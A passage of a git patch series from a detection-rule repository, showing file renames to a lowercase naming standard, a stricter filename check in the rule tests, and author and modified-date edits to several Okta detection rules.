win_exchange_transportagent_failed.yml} | 0 ...scation_stdin+.yml => powershell_invoke_obfuscation_stdin.yml} | 0 ...t_executable_and_script_creation_by_office_using_file_ext.yml} | 0 ...ns.yml => process_creation_lolbins_by_office_applications.yml} | 0 ... => process_creation_lolbins_with_wmiprvse_parent_process.yml} | 0 ...ess_creation_office_from_proxy_executing_regsvr32_payload.yml} | 0 ...ss_creation_office_from_proxy_executing_regsvr32_payload2.yml} | 0 ...e.yml => process_creation_office_spawning_wmi_commandline.yml} | 0 ...{process_creation_SDelete.yml => process_creation_sdelete.yml} | 0 ...voke_obfuscation_clip+.yml => win_invoke_obfuscation_clip.yml} | 0 ...ke_obfuscation_stdin+.yml => win_invoke_obfuscation_stdin.yml} | 0 ...ble_privilege_escalation_via_service_registry_permissions.yml} | 0 18 files changed, 0 insertions(+), 0 deletions(-) rename rules/windows/builtin/{win_exploit_cve_2021_1675_printspooler_Security.yml => win_exploit_cve_2021_1675_printspooler_security.yml} (100%) rename rules/windows/builtin/{win_GPO_scheduledtasks.yml => win_gpo_scheduledtasks.yml} (100%) rename rules/windows/builtin/{win_invoke_obfuscation_stdin+_services.yml => win_invoke_obfuscation_stdin_services.yml} (100%) rename rules/windows/builtin/{win_invoke_obfuscation_stdin+_services_security.yml => win_invoke_obfuscation_stdin_services_security.yml} (100%) rename rules/windows/builtin/{win_rdp_potential_cve-2019-0708.yml => win_rdp_potential_cve_2019_0708.yml} (100%) rename rules/windows/file_event/{file_event_script_files_creation_by_office_applications_using_file_extentions.yml => file_event_script_creation_by_office_using_file_ext.yml} (100%) rename rules/windows/other/{win_exchange_TransportAgent_failed.yml => win_exchange_transportagent_failed.yml} (100%) rename rules/windows/powershell/{powershell_invoke_obfuscation_stdin+.yml => powershell_invoke_obfuscation_stdin.yml} (100%) rename rules/windows/process_creation/{Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml => file_event_executable_and_script_creation_by_office_using_file_ext.yml} (100%) rename rules/windows/process_creation/{Monitor_LOLBins_Process_Creations_by_Office_applications.yml => process_creation_lolbins_by_office_applications.yml} (100%) rename rules/windows/process_creation/{Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml => process_creation_lolbins_with_wmiprvse_parent_process.yml} (100%) rename rules/windows/process_creation/{process_creation_office_applications_from_proxy_executing_regsvr32_with_payload.yml => process_creation_office_from_proxy_executing_regsvr32_payload.yml} (100%) rename rules/windows/process_creation/{process_creation_office_application_from_proxy_executing_regsvr32_with_payload.yml => process_creation_office_from_proxy_executing_regsvr32_payload2.yml} (100%) rename rules/windows/process_creation/{Monitor_Office_Applications_Spawning_WMI_command-line.yml => process_creation_office_spawning_wmi_commandline.yml} (100%) rename rules/windows/process_creation/{process_creation_SDelete.yml => process_creation_sdelete.yml} (100%) rename rules/windows/process_creation/{win_invoke_obfuscation_clip+.yml => win_invoke_obfuscation_clip.yml} (100%) rename rules/windows/process_creation/{win_invoke_obfuscation_stdin+.yml => win_invoke_obfuscation_stdin.yml} (100%) rename rules/windows/process_creation/{process_creation_possible_privilege_escalation_via_service_registry_permissions.yml => win_possible_privilege_escalation_via_service_registry_permissions.yml} (100%) diff --git a/rules/windows/builtin/win_exploit_cve_2021_1675_printspooler_Security.yml b/rules/windows/builtin/win_exploit_cve_2021_1675_printspooler_security.yml similarity index 100% rename from rules/windows/builtin/win_exploit_cve_2021_1675_printspooler_Security.yml rename to rules/windows/builtin/win_exploit_cve_2021_1675_printspooler_security.yml diff --git a/rules/windows/builtin/win_GPO_scheduledtasks.yml b/rules/windows/builtin/win_gpo_scheduledtasks.yml similarity index 100% rename from rules/windows/builtin/win_GPO_scheduledtasks.yml rename to rules/windows/builtin/win_gpo_scheduledtasks.yml diff --git a/rules/windows/builtin/win_invoke_obfuscation_stdin+_services.yml b/rules/windows/builtin/win_invoke_obfuscation_stdin_services.yml similarity index 100% rename from rules/windows/builtin/win_invoke_obfuscation_stdin+_services.yml rename to rules/windows/builtin/win_invoke_obfuscation_stdin_services.yml diff --git a/rules/windows/builtin/win_invoke_obfuscation_stdin+_services_security.yml b/rules/windows/builtin/win_invoke_obfuscation_stdin_services_security.yml similarity index 100% rename from rules/windows/builtin/win_invoke_obfuscation_stdin+_services_security.yml rename to rules/windows/builtin/win_invoke_obfuscation_stdin_services_security.yml diff --git a/rules/windows/builtin/win_rdp_potential_cve-2019-0708.yml b/rules/windows/builtin/win_rdp_potential_cve_2019_0708.yml similarity index 100% rename from rules/windows/builtin/win_rdp_potential_cve-2019-0708.yml rename to rules/windows/builtin/win_rdp_potential_cve_2019_0708.yml diff --git a/rules/windows/file_event/file_event_script_files_creation_by_office_applications_using_file_extentions.yml b/rules/windows/file_event/file_event_script_creation_by_office_using_file_ext.yml similarity index 100% rename from rules/windows/file_event/file_event_script_files_creation_by_office_applications_using_file_extentions.yml rename to rules/windows/file_event/file_event_script_creation_by_office_using_file_ext.yml diff --git a/rules/windows/other/win_exchange_TransportAgent_failed.yml b/rules/windows/other/win_exchange_transportagent_failed.yml similarity index 100% rename from rules/windows/other/win_exchange_TransportAgent_failed.yml rename to rules/windows/other/win_exchange_transportagent_failed.yml diff --git a/rules/windows/powershell/powershell_invoke_obfuscation_stdin+.yml b/rules/windows/powershell/powershell_invoke_obfuscation_stdin.yml similarity index 100% rename from rules/windows/powershell/powershell_invoke_obfuscation_stdin+.yml rename to rules/windows/powershell/powershell_invoke_obfuscation_stdin.yml diff --git a/rules/windows/process_creation/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml b/rules/windows/process_creation/file_event_executable_and_script_creation_by_office_using_file_ext.yml similarity index 100% rename from rules/windows/process_creation/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml rename to rules/windows/process_creation/file_event_executable_and_script_creation_by_office_using_file_ext.yml diff --git a/rules/windows/process_creation/Monitor_LOLBins_Process_Creations_by_Office_applications.yml b/rules/windows/process_creation/process_creation_lolbins_by_office_applications.yml similarity index 100% rename from rules/windows/process_creation/Monitor_LOLBins_Process_Creations_by_Office_applications.yml rename to rules/windows/process_creation/process_creation_lolbins_by_office_applications.yml diff --git a/rules/windows/process_creation/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml b/rules/windows/process_creation/process_creation_lolbins_with_wmiprvse_parent_process.yml similarity index 100% rename from rules/windows/process_creation/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml rename to rules/windows/process_creation/process_creation_lolbins_with_wmiprvse_parent_process.yml diff --git a/rules/windows/process_creation/process_creation_office_applications_from_proxy_executing_regsvr32_with_payload.yml b/rules/windows/process_creation/process_creation_office_from_proxy_executing_regsvr32_payload.yml similarity index 100% rename from rules/windows/process_creation/process_creation_office_applications_from_proxy_executing_regsvr32_with_payload.yml rename to rules/windows/process_creation/process_creation_office_from_proxy_executing_regsvr32_payload.yml diff --git a/rules/windows/process_creation/process_creation_office_application_from_proxy_executing_regsvr32_with_payload.yml b/rules/windows/process_creation/process_creation_office_from_proxy_executing_regsvr32_payload2.yml similarity index 100% rename from rules/windows/process_creation/process_creation_office_application_from_proxy_executing_regsvr32_with_payload.yml rename to rules/windows/process_creation/process_creation_office_from_proxy_executing_regsvr32_payload2.yml diff --git a/rules/windows/process_creation/Monitor_Office_Applications_Spawning_WMI_command-line.yml b/rules/windows/process_creation/process_creation_office_spawning_wmi_commandline.yml similarity index 100% rename from rules/windows/process_creation/Monitor_Office_Applications_Spawning_WMI_command-line.yml rename to rules/windows/process_creation/process_creation_office_spawning_wmi_commandline.yml diff --git a/rules/windows/process_creation/process_creation_SDelete.yml b/rules/windows/process_creation/process_creation_sdelete.yml similarity index 100% rename from rules/windows/process_creation/process_creation_SDelete.yml rename to rules/windows/process_creation/process_creation_sdelete.yml diff --git a/rules/windows/process_creation/win_invoke_obfuscation_clip+.yml b/rules/windows/process_creation/win_invoke_obfuscation_clip.yml similarity index 100% rename from rules/windows/process_creation/win_invoke_obfuscation_clip+.yml rename to rules/windows/process_creation/win_invoke_obfuscation_clip.yml diff --git a/rules/windows/process_creation/win_invoke_obfuscation_stdin+.yml b/rules/windows/process_creation/win_invoke_obfuscation_stdin.yml similarity index 100% rename from rules/windows/process_creation/win_invoke_obfuscation_stdin+.yml rename to rules/windows/process_creation/win_invoke_obfuscation_stdin.yml diff --git a/rules/windows/process_creation/process_creation_possible_privilege_escalation_via_service_registry_permissions.yml b/rules/windows/process_creation/win_possible_privilege_escalation_via_service_registry_permissions.yml similarity index 100% rename from rules/windows/process_creation/process_creation_possible_privilege_escalation_via_service_registry_permissions.yml rename to rules/windows/process_creation/win_possible_privilege_escalation_via_service_registry_permissions.yml From 59891270355fa1e56390afcbee15d743befe20e1 Mon Sep 17 00:00:00 2001 From: frack113 Date: Wed, 22 Sep 2021 19:02:44 +0200 Subject: [PATCH 1051/1367] optimization of name detection --- tests/test_rules.py | 31 ++++++++++++++++++++----------- 1 file changed, 20 insertions(+), 11 deletions(-) diff --git a/tests/test_rules.py b/tests/test_rules.py index ebdbfa27..78bc956a 100755 --- a/tests/test_rules.py +++ b/tests/test_rules.py @@ -47,18 +47,18 @@ class TestRules(unittest.TestCase): return data # Tests - def test_confirm_extension_is_yml(self): - files_with_incorrect_extensions = [] + # def test_confirm_extension_is_yml(self): + # files_with_incorrect_extensions = [] - for file in self.yield_next_rule_file_path(self.path_to_rules): - file_name_and_extension = os.path.splitext(file) - if len(file_name_and_extension) == 2: - extension = file_name_and_extension[1] - if extension != ".yml": - files_with_incorrect_extensions.append(file) + # for file in self.yield_next_rule_file_path(self.path_to_rules): + # file_name_and_extension = os.path.splitext(file) + # if len(file_name_and_extension) == 2: + # extension = file_name_and_extension[1] + # if extension != ".yml": + # files_with_incorrect_extensions.append(file) - self.assertEqual(files_with_incorrect_extensions, [], Fore.RED + - "There are rule files with extensions other than .yml") + # self.assertEqual(files_with_incorrect_extensions, [], Fore.RED + + # "There are rule files with extensions other than .yml") def test_legal_trademark_violations(self): files_with_legal_issues = [] @@ -522,7 +522,16 @@ class TestRules(unittest.TestCase): filename_pattern = re.compile('[a-z0-9_]{10,70}\.yml') for file in self.yield_next_rule_file_path(self.path_to_rules): filename = os.path.basename(file) - if filename_pattern.match(filename) == None or not '_' in filename: + if filename[-4:] != ".yml": + print(Fore.YELLOW + "Rule {} has a invalid extension (.yml).".format(file)) + faulty_rules.append(file) + elif len(filename) > 74: + print(Fore.YELLOW + "Rule {} has a file name too long >70.".format(file)) + faulty_rules.append(file) + elif len(filename) < 14: + print(Fore.YELLOW + "Rule {} has a file name too sort <10.".format(file)) + faulty_rules.append(file) + elif filename_pattern.match(filename) == None or not '_' in filename: print(Fore.YELLOW + "Rule {} has a file name that doesn't match our standard.".format(file)) faulty_rules.append(file) From f186235d8fbc68e1d5b958aff8afb89ed22a6e64 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Wed, 22 Sep 2021 19:51:25 -0500 Subject: [PATCH 1052/1367] Update okta_admin_role_assigned_to_user_or_group.yml --- rules/cloud/okta/okta_admin_role_assigned_to_user_or_group.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/okta/okta_admin_role_assigned_to_user_or_group.yml b/rules/cloud/okta/okta_admin_role_assigned_to_user_or_group.yml index 1ded4c5d..e4a20189 100644 --- a/rules/cloud/okta/okta_admin_role_assigned_to_user_or_group.yml +++ b/rules/cloud/okta/okta_admin_role_assigned_to_user_or_group.yml @@ -1,7 +1,7 @@ title: Okta Admin Role Assigned to an User or Group id: 413d4a81-6c98-4479-9863-014785fd579c description: Detects when an the Administrator role is assigned to an user or group. -author: Austin Songer +author: Austin Songer @austinsonger status: experimental date: 2021/09/12 references: From 1a64dc03a1d59b42ae2858ef15f43648ec3047f9 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Wed, 22 Sep 2021 19:51:31 -0500 Subject: [PATCH 1053/1367] Update okta_api_token_created.yml --- rules/cloud/okta/okta_api_token_created.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/okta/okta_api_token_created.yml b/rules/cloud/okta/okta_api_token_created.yml index 99bff4e8..9ec18dd6 100644 --- a/rules/cloud/okta/okta_api_token_created.yml +++ b/rules/cloud/okta/okta_api_token_created.yml @@ -1,7 +1,7 @@ title: Okta API Token Created id: 19951c21-229d-4ccb-8774-b993c3ff3c5c description: Detects when a API token is created -author: Austin Songer +author: Austin Songer @austinsonger status: experimental date: 2021/09/12 references: From 8dfae4c78553a93837f4527b0f233d5e5e5e2f77 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Wed, 22 Sep 2021 19:51:44 -0500 Subject: [PATCH 1054/1367] Update okta_api_token_revoked.yml --- rules/cloud/okta/okta_api_token_revoked.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/okta/okta_api_token_revoked.yml b/rules/cloud/okta/okta_api_token_revoked.yml index 76738fb9..3e3ae817 100644 --- a/rules/cloud/okta/okta_api_token_revoked.yml +++ b/rules/cloud/okta/okta_api_token_revoked.yml @@ -1,7 +1,7 @@ title: Okta API Token Revoked id: cf1dbc6b-6205-41b4-9b88-a83980d2255b description: Detects when a API Token is revoked. -author: Austin Songer +author: Austin Songer @austinsonger status: experimental date: 2021/09/12 references: From 11732970fca40060406a6fac0badd84429980832 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Wed, 22 Sep 2021 19:51:51 -0500 Subject: [PATCH 1055/1367] Update okta_application_modified_or_deleted.yml --- rules/cloud/okta/okta_application_modified_or_deleted.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/okta/okta_application_modified_or_deleted.yml b/rules/cloud/okta/okta_application_modified_or_deleted.yml index 63401971..44d81357 100644 --- a/rules/cloud/okta/okta_application_modified_or_deleted.yml +++ b/rules/cloud/okta/okta_application_modified_or_deleted.yml @@ -1,7 +1,7 @@ title: Okta Application Modified or Deleted id: 7899144b-e416-4c28-b0b5-ab8f9e0a541d description: Detects when an application is modified or deleted. -author: Austin Songer +author: Austin Songer @austinsonger status: experimental date: 2021/09/12 references: From 12f76cdf6b5acbfe44ac2f800f829868553cb923 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Wed, 22 Sep 2021 19:51:58 -0500 Subject: [PATCH 1056/1367] Update okta_application_sign-on_policy_modified_or_deleted.yml --- .../okta_application_sign-on_policy_modified_or_deleted.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/okta/okta_application_sign-on_policy_modified_or_deleted.yml b/rules/cloud/okta/okta_application_sign-on_policy_modified_or_deleted.yml index 3b067027..e8e950b9 100644 --- a/rules/cloud/okta/okta_application_sign-on_policy_modified_or_deleted.yml +++ b/rules/cloud/okta/okta_application_sign-on_policy_modified_or_deleted.yml @@ -1,7 +1,7 @@ title: Okta Application Sign-On Policy Modified or Deleted id: 8f668cc4-c18e-45fe-ad00-624a981cf88a description: Detects when an application Sign-on Policy is modified or deleted. -author: Austin Songer +author: Austin Songer @austinsonger status: experimental date: 2021/09/12 references: From 38e09f061dcbe7b3fd55742854316fa4dc2d8e96 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Wed, 22 Sep 2021 19:52:04 -0500 Subject: [PATCH 1057/1367] Update okta_mfa_reset_or_deactivated.yml --- rules/cloud/okta/okta_mfa_reset_or_deactivated.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/okta/okta_mfa_reset_or_deactivated.yml b/rules/cloud/okta/okta_mfa_reset_or_deactivated.yml index ba789082..fc8797b3 100644 --- a/rules/cloud/okta/okta_mfa_reset_or_deactivated.yml +++ b/rules/cloud/okta/okta_mfa_reset_or_deactivated.yml @@ -1,7 +1,7 @@ title: Okta MFA Reset or Deactivated id: 50e068d7-1e6b-4054-87e5-0a592c40c7e0 description: Detects when an attempt at deactivating or resetting MFA. -author: Austin Songer +author: Austin Songer @austinsonger status: experimental date: 2021/09/21 references: From e1eb8c6222f69b3ae54e20a732a546604c40da20 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Wed, 22 Sep 2021 19:52:10 -0500 Subject: [PATCH 1058/1367] Update okta_network_zone_deactivated_or_deleted.yml --- rules/cloud/okta/okta_network_zone_deactivated_or_deleted.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/okta/okta_network_zone_deactivated_or_deleted.yml b/rules/cloud/okta/okta_network_zone_deactivated_or_deleted.yml index 5d174c95..7b38076c 100644 --- a/rules/cloud/okta/okta_network_zone_deactivated_or_deleted.yml +++ b/rules/cloud/okta/okta_network_zone_deactivated_or_deleted.yml @@ -1,7 +1,7 @@ title: Okta Network Zone Deactivated or Deleted id: 9f308120-69ed-4506-abde-ac6da81f4310 description: Detects when an Network Zone is Deactivated or Deleted. -author: Austin Songer +author: Austin Songer @austinsonger status: experimental date: 2021/09/12 references: From cead26637ba6f58050444214ab42411792b98aa0 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Wed, 22 Sep 2021 19:52:17 -0500 Subject: [PATCH 1059/1367] Update okta_policy_modified_or_deleted.yml --- rules/cloud/okta/okta_policy_modified_or_deleted.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/okta/okta_policy_modified_or_deleted.yml b/rules/cloud/okta/okta_policy_modified_or_deleted.yml index 2e72accd..010f0283 100644 --- a/rules/cloud/okta/okta_policy_modified_or_deleted.yml +++ b/rules/cloud/okta/okta_policy_modified_or_deleted.yml @@ -1,7 +1,7 @@ title: Okta Policy Modified or Deleted id: 1667a172-ed4c-463c-9969-efd92195319a description: Detects when an Okta policy is modified or deleted. -author: Austin Songer +author: Austin Songer @austinsonger status: experimental date: 2021/09/12 references: From 1aec430291bb01ad2bed78cab276eea1f795b3c7 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Wed, 22 Sep 2021 19:52:23 -0500 Subject: [PATCH 1060/1367] Update okta_policy_rule_modified_or_deleted.yml --- rules/cloud/okta/okta_policy_rule_modified_or_deleted.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/okta/okta_policy_rule_modified_or_deleted.yml b/rules/cloud/okta/okta_policy_rule_modified_or_deleted.yml index 0cc96a97..4add1cda 100644 --- a/rules/cloud/okta/okta_policy_rule_modified_or_deleted.yml +++ b/rules/cloud/okta/okta_policy_rule_modified_or_deleted.yml @@ -1,7 +1,7 @@ title: Okta Policy Rule Modified or Deleted id: 0c97c1d3-4057-45c9-b148-1de94b631931 description: Detects when an Policy Rule is Modified or Deleted. -author: Austin Songer +author: Austin Songer @austinsonger status: experimental date: 2021/09/12 references: From 2ab5ba0a0c4fbdeb9d86c2979a4d40813dc05be4 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Wed, 22 Sep 2021 19:52:29 -0500 Subject: [PATCH 1061/1367] Update okta_security_threat_detected.yml --- rules/cloud/okta/okta_security_threat_detected.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/okta/okta_security_threat_detected.yml b/rules/cloud/okta/okta_security_threat_detected.yml index 1284f8c9..73c9b331 100644 --- a/rules/cloud/okta/okta_security_threat_detected.yml +++ b/rules/cloud/okta/okta_security_threat_detected.yml @@ -1,7 +1,7 @@ title: Okta Security Threat Detected id: 5c82f0b9-3c6d-477f-a318-0e14a1df73e0 description: Detects when an security threat is detected in Okta. -author: Austin Songer +author: Austin Songer @austinsonger status: experimental date: 2021/09/12 references: From 275ebf7884097f849fb04e7902622762232e8ca9 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Wed, 22 Sep 2021 19:52:36 -0500 Subject: [PATCH 1062/1367] Update okta_unauthorized_access_to_app.yml --- rules/cloud/okta/okta_unauthorized_access_to_app.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/okta/okta_unauthorized_access_to_app.yml b/rules/cloud/okta/okta_unauthorized_access_to_app.yml index f0045b70..113cb352 100644 --- a/rules/cloud/okta/okta_unauthorized_access_to_app.yml +++ b/rules/cloud/okta/okta_unauthorized_access_to_app.yml @@ -1,7 +1,7 @@ title: Okta Unauthorized Access to App id: 6cc2b61b-d97e-42ef-a9dd-8aa8dc951657 description: Detects when unauthorized access to app occurs. -author: Austin Songer +author: Austin Songer @austinsonger status: experimental date: 2021/09/12 references: From 74452347fb2c3dfd1035168ec308fe529bd00db6 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Wed, 22 Sep 2021 19:52:43 -0500 Subject: [PATCH 1063/1367] Update okta_user_account_locked_out.yml --- rules/cloud/okta/okta_user_account_locked_out.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/okta/okta_user_account_locked_out.yml b/rules/cloud/okta/okta_user_account_locked_out.yml index 0b5c5930..c036bd96 100644 --- a/rules/cloud/okta/okta_user_account_locked_out.yml +++ b/rules/cloud/okta/okta_user_account_locked_out.yml @@ -1,7 +1,7 @@ title: Okta User Account Locked Out id: 14701da0-4b0f-4ee6-9c95-2ffb4e73bb9a description: Detects when an user account is locked out. -author: Austin Songer +author: Austin Songer @austinsonger status: experimental date: 2021/09/12 references: From ecb18ec149940ee286d9d5392d9eba0783d870b2 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Wed, 22 Sep 2021 19:53:28 -0500 Subject: [PATCH 1064/1367] Update okta_admin_role_assigned_to_user_or_group.yml --- rules/cloud/okta/okta_admin_role_assigned_to_user_or_group.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/rules/cloud/okta/okta_admin_role_assigned_to_user_or_group.yml b/rules/cloud/okta/okta_admin_role_assigned_to_user_or_group.yml index e4a20189..7f337701 100644 --- a/rules/cloud/okta/okta_admin_role_assigned_to_user_or_group.yml +++ b/rules/cloud/okta/okta_admin_role_assigned_to_user_or_group.yml @@ -4,6 +4,7 @@ description: Detects when an the Administrator role is assigned to an user or gr author: Austin Songer @austinsonger status: experimental date: 2021/09/12 +modified: 2021/09/22 references: - https://developer.okta.com/docs/reference/api/system-log/ - https://developer.okta.com/docs/reference/api/event-types/ From 6401f9b4d9e78292d36313f901701adcecdb3690 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Wed, 22 Sep 2021 19:53:36 -0500 Subject: [PATCH 1065/1367] Update okta_api_token_created.yml --- rules/cloud/okta/okta_api_token_created.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/rules/cloud/okta/okta_api_token_created.yml b/rules/cloud/okta/okta_api_token_created.yml index 9ec18dd6..4969a846 100644 --- a/rules/cloud/okta/okta_api_token_created.yml +++ b/rules/cloud/okta/okta_api_token_created.yml @@ -4,6 +4,7 @@ description: Detects when a API token is created author: Austin Songer @austinsonger status: experimental date: 2021/09/12 +modified: 2021/09/22 references: - https://developer.okta.com/docs/reference/api/system-log/ - https://developer.okta.com/docs/reference/api/event-types/ From ccd9f8d6dc030203aa8031de235e16b6eca4bc0b Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Wed, 22 Sep 2021 19:53:43 -0500 Subject: [PATCH 1066/1367] Update okta_api_token_revoked.yml --- rules/cloud/okta/okta_api_token_revoked.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/rules/cloud/okta/okta_api_token_revoked.yml b/rules/cloud/okta/okta_api_token_revoked.yml index 3e3ae817..ba2f81b9 100644 --- a/rules/cloud/okta/okta_api_token_revoked.yml +++ b/rules/cloud/okta/okta_api_token_revoked.yml @@ -4,6 +4,7 @@ description: Detects when a API Token is revoked. author: Austin Songer @austinsonger status: experimental date: 2021/09/12 +modified: 2021/09/22 references: - https://developer.okta.com/docs/reference/api/system-log/ - https://developer.okta.com/docs/reference/api/event-types/ From 1effd8b18716d326dc016f77e41238e45d4b2dad Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Wed, 22 Sep 2021 19:53:49 -0500 Subject: [PATCH 1067/1367] Update okta_application_modified_or_deleted.yml --- rules/cloud/okta/okta_application_modified_or_deleted.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/rules/cloud/okta/okta_application_modified_or_deleted.yml b/rules/cloud/okta/okta_application_modified_or_deleted.yml index 44d81357..078c764b 100644 --- a/rules/cloud/okta/okta_application_modified_or_deleted.yml +++ b/rules/cloud/okta/okta_application_modified_or_deleted.yml @@ -4,6 +4,7 @@ description: Detects when an application is modified or deleted. author: Austin Songer @austinsonger status: experimental date: 2021/09/12 +modified: 2021/09/22 references: - https://developer.okta.com/docs/reference/api/system-log/ - https://developer.okta.com/docs/reference/api/event-types/ From f673eb413e3109c5e58199bcc4180190e7d383df Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Wed, 22 Sep 2021 19:53:56 -0500 Subject: [PATCH 1068/1367] Update okta_application_sign-on_policy_modified_or_deleted.yml --- .../okta/okta_application_sign-on_policy_modified_or_deleted.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/rules/cloud/okta/okta_application_sign-on_policy_modified_or_deleted.yml b/rules/cloud/okta/okta_application_sign-on_policy_modified_or_deleted.yml index e8e950b9..fb13c385 100644 --- a/rules/cloud/okta/okta_application_sign-on_policy_modified_or_deleted.yml +++ b/rules/cloud/okta/okta_application_sign-on_policy_modified_or_deleted.yml @@ -4,6 +4,7 @@ description: Detects when an application Sign-on Policy is modified or deleted. author: Austin Songer @austinsonger status: experimental date: 2021/09/12 +modified: 2021/09/22 references: - https://developer.okta.com/docs/reference/api/system-log/ - https://developer.okta.com/docs/reference/api/event-types/ From ea73c692d7fa0a44a7eb1cb9477d6e35b67c7e70 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Wed, 22 Sep 2021 19:54:02 -0500 Subject: [PATCH 1069/1367] Update okta_mfa_reset_or_deactivated.yml --- rules/cloud/okta/okta_mfa_reset_or_deactivated.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/rules/cloud/okta/okta_mfa_reset_or_deactivated.yml b/rules/cloud/okta/okta_mfa_reset_or_deactivated.yml index fc8797b3..acc04ac8 100644 --- a/rules/cloud/okta/okta_mfa_reset_or_deactivated.yml +++ b/rules/cloud/okta/okta_mfa_reset_or_deactivated.yml @@ -4,6 +4,7 @@ description: Detects when an attempt at deactivating or resetting MFA. author: Austin Songer @austinsonger status: experimental date: 2021/09/21 +modified: 2021/09/22 references: - https://developer.okta.com/docs/reference/api/system-log/ - https://developer.okta.com/docs/reference/api/event-types/ From 9d910d823ad5333e50cc8595c2c3d85b3da98cc9 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Wed, 22 Sep 2021 19:54:09 -0500 Subject: [PATCH 1070/1367] Update okta_network_zone_deactivated_or_deleted.yml --- rules/cloud/okta/okta_network_zone_deactivated_or_deleted.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/rules/cloud/okta/okta_network_zone_deactivated_or_deleted.yml b/rules/cloud/okta/okta_network_zone_deactivated_or_deleted.yml index 7b38076c..273d8713 100644 --- a/rules/cloud/okta/okta_network_zone_deactivated_or_deleted.yml +++ b/rules/cloud/okta/okta_network_zone_deactivated_or_deleted.yml @@ -4,6 +4,7 @@ description: Detects when an Network Zone is Deactivated or Deleted. author: Austin Songer @austinsonger status: experimental date: 2021/09/12 +modified: 2021/09/22 references: - https://developer.okta.com/docs/reference/api/system-log/ - https://developer.okta.com/docs/reference/api/event-types/ From 100eb06e7a80e6004a956734b3a9791cff7d2911 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Wed, 22 Sep 2021 19:54:15 -0500 Subject: [PATCH 1071/1367] Update okta_policy_modified_or_deleted.yml --- rules/cloud/okta/okta_policy_modified_or_deleted.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/rules/cloud/okta/okta_policy_modified_or_deleted.yml b/rules/cloud/okta/okta_policy_modified_or_deleted.yml index 010f0283..fb4aa5b2 100644 --- a/rules/cloud/okta/okta_policy_modified_or_deleted.yml +++ b/rules/cloud/okta/okta_policy_modified_or_deleted.yml @@ -4,6 +4,7 @@ description: Detects when an Okta policy is modified or deleted. author: Austin Songer @austinsonger status: experimental date: 2021/09/12 +modified: 2021/09/22 references: - https://developer.okta.com/docs/reference/api/system-log/ - https://developer.okta.com/docs/reference/api/event-types/ From f55b9ef024a6497ad68b2dbb108b094df2e1dcdd Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Wed, 22 Sep 2021 19:54:23 -0500 Subject: [PATCH 1072/1367] Update okta_policy_rule_modified_or_deleted.yml --- rules/cloud/okta/okta_policy_rule_modified_or_deleted.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/rules/cloud/okta/okta_policy_rule_modified_or_deleted.yml b/rules/cloud/okta/okta_policy_rule_modified_or_deleted.yml index 4add1cda..278171eb 100644 --- a/rules/cloud/okta/okta_policy_rule_modified_or_deleted.yml +++ b/rules/cloud/okta/okta_policy_rule_modified_or_deleted.yml @@ -4,6 +4,7 @@ description: Detects when an Policy Rule is Modified or Deleted. author: Austin Songer @austinsonger status: experimental date: 2021/09/12 +modified: 2021/09/22 references: - https://developer.okta.com/docs/reference/api/system-log/ - https://developer.okta.com/docs/reference/api/event-types/ From 26b99a44c0cce643f5a4ca92d5d01cef6617ba01 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Wed, 22 Sep 2021 19:54:32 -0500 Subject: [PATCH 1073/1367] Update okta_security_threat_detected.yml --- rules/cloud/okta/okta_security_threat_detected.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/rules/cloud/okta/okta_security_threat_detected.yml b/rules/cloud/okta/okta_security_threat_detected.yml index 73c9b331..8e754c45 100644 --- a/rules/cloud/okta/okta_security_threat_detected.yml +++ b/rules/cloud/okta/okta_security_threat_detected.yml @@ -4,6 +4,7 @@ description: Detects when an 